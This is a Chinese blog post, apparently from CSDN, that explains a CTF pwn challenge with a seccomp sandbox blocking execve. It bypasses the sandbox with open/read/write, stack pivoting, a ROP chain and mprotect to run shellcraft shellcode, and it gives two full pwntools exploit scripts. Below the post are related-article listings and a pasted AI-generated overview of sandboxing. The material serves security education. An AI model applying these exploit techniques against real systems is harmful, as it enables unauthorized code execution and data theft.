沙盒ORW

最新推荐文章于 2024-10-27 21:45:33 发布
最新推荐文章于 2024-10-27 21:45:33 发布
阅读量2.3k 收藏 46
点赞数 65
CC 4.0 BY-SA版权
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_79880752/article/details/136016919
本文讲述了在CTF比赛中遇到的受限沙盒环境下的pwn题目解决方法,利用ORW技术绕过沙盒限制,结合IDA分析和栈迁移技巧,通过mprotect函数修改内存权限,最终获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

先说说什么是沙盒吧

        沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。
  在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,只能采取ORW,即open/read/write的组合方式来读取flag。

例题

废话不多说,直接上例题:

开启NX,64位,动态编译,IDA分析:

打印puts函数地址后栈溢出

第一时间想到了libc做法,但是发现报错了,查看之后发现开启了沙盒

终端查看指令:seccomp-tools dump ./文件名

其实有时候在IDA里也可以查看是否开启沙盒保护,例如今年的HGAME比赛pwn的第二题:

你可以直接在IDA里看到这一串伪代码,其中seccomp函数就是沙盒保护开启的标志

但是今天我要讲的例题在IDA中看不出来,因此我们使用指令查看(后续会出HGAME题目的分析,有兴趣的朋友可以关注看后续

继续分析本道例题:

因为题目开启沙盒,限制execve的系统调用,因此我们并不能通过常规的one_gadget和system调用来得到flag,因此我使用了orw的方法来解题

思路如下:

既然题目开始就给了我们puts函数的地址,那我们就可以接收后直接得到libc基址

那就有人要问了,不是不调用system了嘛,还要基址干嘛

这是为了调用mprotect函数,这边为以后做题增加了一个新思路,就是以后有libc基址可以调用mprotect函数

通过调用mprotect函数我们可以修改bss段地址的权限为可读可写可执行(rwx)

随后我们就可以通过open/read/write的组合方式来读取flag

前面求出libc基址,随后我们就可以通过libc基址求出三个函数的地址直接调用读取flag。

你以为到这就完了嘛

其实到这之后还是不行,运行脚本会发现没有执行mprotect函数

这就需要通过栈迁移,将bss段迁到栈上不就可以执行了,不会的朋友可以看看我第一篇博文

https://blog.youkuaiyun.com/2301_79880752/article/details/135721773?spm=1001.2014.3001.5501

实操康康吧:

先看看思路一的吧

首先接收puts函数地址,求出libc基址:

可以看到成功打印出libc基址

接下来需要先查找一个bss段地址,并将其迁到栈上:

在IDA伪代码处Ctrl+s查找bss段地址

可以看到,read函数读入位置也是成功迁移到了bss段上,这样就将bss段迁到了栈上

在写入rop链之前我们还需要计算mprotect的地址,以及其所需要的三个寄存器的地址

mprotect函数的地址只需要用libc基址加上它的偏移即可求出

随后使用指令:ROPgadget --binary 文件名  --only 'pop|ret'   来查找所需的寄存器地址

发现只有一个rdi的地址,并没有rsi跟rdx的,这边就要将一个新的知识点了

有时候我们会发现找不到需要的寄存器,这时候我们可以调用libc里的寄存器,当然这需要远程有提供libc基址

只需要将指令 ROPgadget --binary 文件名  --only 'pop|ret'  文件名改为libc的路径,就可以找到寄存器在libc中的偏移

注意:

找rdx偏移时不能找pop-rdx,要找pop rdx,r12,就是后面得再跟一个,因为高版本的虚拟机会卡

可以看到我们也是成功找到了,值得一提的是,打远程时这些地址需要重新寻找,因为远程的libc库可能跟本地的不一样,找出来的偏移也不一样

这时候我们已经可以调用mprotect函数修改bss段权限了

这里将修改地址后三位改为0,不懂的朋友可以看看我前面专门解释mprotect的博文

https://blog.youkuaiyun.com/2301_79880752/article/details/135828763?spm=1001.2014.3001.5501

接下来就剩下orw了

这里调用orw有两种思路,其一是直接构造open/read/write函数,当然这就需要再通过lilbc去寻找orw的地址,再手搓出rop链了,但这种方法不需要我们再调用mprotec函数修改权限,直接用栈迁移就可以实现,其二是使用asm工具直接生成汇编代码,但这种方法需要调用mprotect函数去修改bss段权限去执行asm生成的汇编代码

这边只为大家讲解第二种思路,因为第二种思路实际上更加节省字节,最后会将两种思路的脚本都给到大家

使用orw,我们需要先调用open函数打开根目录flag文件,再调用read函数从中读入得到的flag,最后调用write函数将flag打印出来

这里因为我们需要从flag中读取数据,因此read函数的第一个参数为3(一般情况下为1)

至此,本题的脚本编写完毕

运行脚本发现确实可以获取flag:

由于这边博🐖打的是本地,因此得到的flag也是博🐖自己本地的,打远程的时候是可以获取远程的flag的,这个大家不用担心

思路一脚本:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
p=process("./pwn1")
elf=ELF("./pwn1")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
def bug():
         gdb.attach(p)
         pause()
rdi=0x00000000004012c3         
bss=0x404040+0x200
read=0x401220
p.recvuntil("0x")
libc_base=int(p.recv(12),16)-libc.sym['puts']
print(hex(libc_base))
rsi=libc_base+0x000000000002be51
rdx_r12=libc_base+0x000000000011f497
open_addr=libc_base+libc.sym['open']
read_addr=libc_base+libc.sym['read']
write_addr=libc_base+libc.sym['write']
payload  =b'/flag\x00\x00\x00'
payload +=p64(rdi)
payload +=p64(bss+0x20)
payload +=p64(rsi)
payload +=p64(0)
payload +=p64(open_addr)

payload +=p64(rdi)
payload +=p64(3)
payload +=p64(rsi)
payload +=p64(bss+0x600)
payload +=p64(rdx_r12)
payload +=p64(0x100)*2
payload +=p64(read_addr)

payload +=p64(rdi)
payload +=p64(1)
payload +=p64(rsi)
payload +=p64(bss+0x600)
payload +=p64(rdx_r12)
payload +=p64(0x100)*2
payload +=p64(write_addr)

pay=b'a'*(0x20)+p64(bss+0x20)+p64(read)    
bug()
p.sendline(pay)
pause()
p.send(b'a'*(0x20)+payload)
p.interactive()

思路二脚本:

from pwn import *
context(log_level='debug',os='linux',arch='amd64')
#p=remote("node4.buuoj.cn",29608)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
p=process("./pwn")
elf=ELF("./pwn")
def bug():
	gdb.attach(p)
	pause()
p.recvuntil("0x")
libc_base=int(p.recv(12),16)-libc.sym['puts']
print(hex(libc_base))

bss=0x404040
rdi=0x00000000004012c3
pay=b'a'*0x20+p64(bss+0x20)+p64(0x401220)
p.send(pay)

pause()

rsi=libc_base+0x000000000002be51
rdx_r12=libc_base+0x000000000011f497
mprotect=libc_base+libc.sym['mprotect']

pay=b'a'*0x28
pay += p64(rdi)
pay += p64(0x404000)
pay += p64(rsi)
pay += p64(0x1000)
pay += p64(rdx_r12)
pay += p64(7)*2
pay += p64(mprotect)
pay += p64(bss+0x28+0x48)
pay += asm(shellcraft.open("/flag"))
pay += asm(shellcraft.read(3,bss+0x500,0x100))
pay += asm(shellcraft.write(1,bss+0x500,0x100))

p.send(pay)

p.interactive()

Pers1st.
关注
Hgame-2023(前三周pwn题解)
weixin_73290593的博客
02-01 1465
hgame,真好玩
PWN题[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4923
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
【CTF】【PWNorw
m0_50819561的博客
10-09 1713
这是机制,就是限制你能使用的syscall。 seccomp-tools这个工具能快速地查出你能使用地syscall。 我们能使用的常用的构造攻击链的只有open,read,write。 但是因为限制了syscall,所以我们不能用特殊的系统调用getshell。 有两种方法,一种直接写汇编,一种利用shellcraft构造。 下面是汇编: ...
PWN_3 ORW
weixin_30781107的博客
02-18 753
2018-02-18 15:44:34 Open Write Read open函数 #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> int open(const char *pathname, int...
BUUCTF pwnable_orw
BengDouLove的博客
04-12 600
这道题又是一道seccomp,,这个orw_seccomp函数里面说的傻我看不懂。。。 反正根据套路肯定还是不能用system,,还是通过 open,read,write,来泄露flag文件 写这种shellcode写的方法一个是直接汇编 或者 可以用pwntools里面带的shellcraft pwntools官方文档 其他的没啥可说的,看一下代码 shellcraft: #cod...
[BUUCTF-pwn]——pwnable_orw   (ORW
Y_peak的博客
03-16 1491
[BUUCTF-pwn]——pwnable_orw 第一次碰到orw的问题,所谓orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 这个时候可以通过seccomptools,来查看 注意看到prctl就是将系统调用给你禁止了 exploit from pwn import * context.arch = 'i386' p = remote('node3.buuoj.cn',28626) shellcode = she
[BUUCTF-pwn]——pwnable_orw
半岛铁盒的博客
06-12 1923
记一次ORW的题目 orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 32位程序,开启了canary 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandbox
绕过:orw的两种利用方式
2302_79813730的博客
02-02 2449
接下来借一道例题来讲一下orw(open,read,write)的两种利用方式,open(打开)flag文件,将他read(读入)该有的位置,并(write)写出来,一般选取的都是bss段,但这里一般没有那么大的权限,就需要mprotect去该权限(前边已经讲过了,这个也是箱的基础),再利用orw。2直接进行计算,通过脚本可以知道,我们payload链读入到bss+0x28的位置,p64()打包为八个字节,中间有个*2要注意,再算上返回地址本身,一共是0x48,也就计算出来了。
2022强网拟态pwn-store
z1r0的博客
11-22 872
首先是这个箱,64位只有r和w,一开始看的时候很纳闷多了32位的限制,64位还没有o,查了一下才知道这样的seccomp-tools是以64位的检查来检查的,所以上面显示的32位系统调用就是64位的系统调用,所以看一下上面在32位显示的这些实际上是多少。所以思路比较清楚,利用house of apple2控制程序流程,mprotect控制rwx权限,布置shellcode,需要注意的是远程flag文件名需要getdents找一下,找完了之后利用orw即可。chmod对应是0x5a,对应32位是mmap。
[CTF]PWN--中的栈迁移构造read利用
2301_79880752的博客
02-26 1341
我们需要在调试中寻找read函数的返回地址,将其作为读入的位置,因为我们后面要在这个构造的read函数中读入orw,我们将orw写入到read函数返回地址上,这样读入之后就可以直接执行orw获取权限,为了使程序运行成功我们可以先随便写一个bss地址作为读入位置。还记得我们一开始将读入位置迁到bss段上了吗,连接远程时程序运行时的生成栈地址可能会改变,但是,内存(bss)是不会变的,因此本题我们可以直接通过调试得到返回地址,而这个返回地址必然是bss段地址,也就是说在连接远程的时候是不会改变的。
setcontext+orw
「 虚幻私塾」
01-27 895
Python微信订餐小程序课程视频 https://edu.youkuaiyun.com/course/detail/36074 Python实战量化交易理财系统 https://edu.youkuaiyun.com/course/detail/35475 setcontext+orw 大致可以把2.27,2.29做为两个分界点。 我们先来讨论 2.27 及以下的 setcontext + orw 的写法。 首先 setcontext 是什么?了解过 SROP 的师傅应该知道 pwntools 自带了一款可以控制寄存器值的工具。模
关于箱关闭execve的绕过技巧及SROP的简单利用方法 --(buuctf[V&N2020 公开赛])babybabypwn + warmup
PLpa的博客
07-05 1749
前言 最近做buuctf又发现一种以前没有见过的箱关闭execve的题目,在网上找了很多资料,终于初步了解了一些简单的绕过技巧,故写此博客记录一下。 [V&N2020 公开赛]babybabypwn 查看保护 保护全开的64位Linux程序。 IDA查看伪代码 直接进入main函数看看,发现syscall函数,并不是很了解这个函数,但是通过百度我们知道syscall的几个参数的意义。 第一个参数表示syscall调用的函数,例如题目中的15调用的就是sigreturn。 看到sigreturn
CTF-pwn: orw
weixin_59166557的博客
10-27 852
ORW(Open, Read, Write)是一种常见的利用技术,通常用于在攻破某个系统后读取文件(例如读出 flag 文件)的场景。
BUUCTF:pwnable_orw
qq_44768749的博客
08-27 1808
BUUCTF:pwnable_orw0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 32位程序,开启了canary保护 0x02 运行 提示输入shellcode 0x03 IDA main函数 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是
【八芒星计划】 ORW
carol2358的博客
09-01 4218
本篇用来记录ORWORW可以分为2.27以下的orw和2.29以上的orw,如果是本地请自备flag文件 orw技术是用来应对的 文章目录oooorder2019-BALSN-CTF-plaintext oooorder 本题是2.27的orw,漏洞是uaf,漏洞在这里不展开讲,uaf也并不难 2.27的orw既可以使用heap_addr,也可以不要,先讲不需要heap_addr的,毕竟能少泄漏就少泄漏 最重要的是使用了setcontext这个函数,来达成我们控制寄存器的目的 2.27得setcont
buuctf pwnable_orw
qq_42728977的博客
04-12 424
限制条件下的shellcode 参考链接: https://www.cnblogs.com/chrysanthemum/p/12323183.html http://www.chiange.com/pwnable-tw-orw/
[BUUCTF]PWN——pwnable_orw
mcmuyanga的博客
11-10 2263
pwnable_orw 附件 步骤: 例行检查,32位程序,开启了canary 本地运行一下程序,看看大概的情况,提示我们输入shellcode 32位ida载入,检索字符串,没看见什么可以直接利用的,直接看main函数 orw_seccomp函数 prctl在百度后知道了是机制,具体的看这篇文章 prctl seccomp相当于内核中的一种安全机制,正常情况下,程序可以使用所有的syscall,但是当劫持程序流程之后通过exeve来呼叫syscall得到shell时seccomp边
orwpwnable_orw和[V&N2020 公开赛]warmup)和 picoctf_2018_rop chain 记录笔记
carol2358的博客
05-21 1511
学到一种新的做法,orw(open,read,write),可以用在system,fork syscall(不能打开子进程,需要在当前进程里读入flag并输出) 和execve被禁的情况下打印出flag,还有seccomp 虽然还不太懂,但先记录一下目前的理解 seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。 著作权归作者所有。商业转
BUUCTF pwnable_orw WP
weixin_44645415的博客
08-18 471
限制系统调用&&shellcode 1,文件分析 checksec Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 有canary保护,但是又有存在RWX权限的段,可以考虑写入shellcod
最新发布
03-12
<think>嗯,用户想了解技术的实现原理、安全性和虚拟化相关内容。首先,我需要回忆一下的基本概念。技术听起来像是一种隔离环境,用于运行不受信任的程序,防止它们对系统造成损害。根据用户提供的引用,分为传统虚拟技术型和策略限制型两种,比如引用[^1]提到的。 接下来,实现原理方面,可能涉及进程隔离、虚拟化技术、策略限制等。比如引用[^4]提到移动应用中的安全容器,通过应用虚拟化隔离工作区。虚拟化可能包括文件系统、注册表、网络资源的虚拟化,这样程序在中的操作不会影响真实系统。 安全性方面,安全模型可能存在矛盾,比如引用[^2]指出防泄密时假设本机系统不可信,但隔离又依赖本机系统的可信性。这需要解释传统和防泄密的不同应用场景和潜在问题。 虚拟化技术部分,用户可能想知道如何利用虚拟化,比如引用[^3]提到箱作为受控的虚拟环境分析恶意软件行为。这里需要区分全虚拟化和轻量级虚拟化,如Docker容器与的区别。 用户可能还关心的应用场景,比如恶意软件分析、软件开发测试、移动应用隔离等。引用提到MAM中的安全容器,用于企业数据隔离。需要结合这些引用说明不同场景下的技术实现。 另外,用户的问题可能隐含想了解技术的优缺点,比如性能开销、逃逸风险等。根据引用,防泄密的模型矛盾可能导致安全隐患,需要指出这点。 最后,生成相关问题时要覆盖原理、实现方式、安全性、应用和挑战,确保问题能引导用户深入理解。比如询问如何防止恶意软件逃逸,或者策略限制型的具体技术。</think>### 技术原理与实现分析 #### 一、核心原理 技术通过**隔离与虚拟化**实现安全控制,其核心逻辑可总结为: $$安全控制 = 隔离边界 + 资源虚拟化 + 策略限制$$ 1. **进程隔离**:通过命名空间隔离(Linux namespaces)或作业对象(Windows Job Objects)创建独立执行环境[^1] 2. **虚拟化层**:构建虚拟文件系统、注册表、网络接口等资源,如引用[^3]所述恶意软件分析环境 3. **策略引擎**:基于白名单/黑名单控制进程行为,拦截高危操作(如驱动安装、底层磁盘访问)[^1] #### 二、关键技术实现 1. **传统虚拟化**(引用类型一) - 使用硬件辅助虚拟化(Intel VT-x/AMD-V) - 完整虚拟化示例: ```c // 伪代码示意虚拟CPU上下文切换 vmx_vmwrite(VMCS_GUEST_CR3, guest_cr3); vmx_vmwrite(VMCS_CTRL_ENTRY_INTERRUPTION_INFO, INTR_TYPE_HW_EXCEPTION); ``` - 性能开销约15-30% 2. **策略限制型**(引用类型二) - 基于Windows Filtering Platform实现文件重定向: $$真实路径\ C:\file → 虚拟路径\ Sandbox\C\file$$ - 使用API Hook拦截关键系统调用 3. **移动端安全容器**(引用[^4]) - iOS实现: ```objective-c // 设置容器目录访问权限 [fileManager setAttributes:@{NSFileProtectionKey:NSFileProtectionComplete} ofItemAtPath:containerPath error:nil]; ``` - Android Binder机制实现跨进程通信隔离 #### 三、安全模型矛盾性 如引用指出的悖论: $$可信假设冲突 = 可信进程隔离 + 不可信环境依赖$$ 在防泄密场景中,需要: 1. 假设宿主系统不可信 2. 但策略执行依赖宿主系统的安全组件 3. 可能通过TEE(可信执行环境)缓解该矛盾 #### 四、典型应用场景 1. 恶意软件动态分析(引用) 2. 企业移动数据隔离(引用) 3. 浏览器安全(如Chromium渲染进程隔离) 4. 软件开发测试环境
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值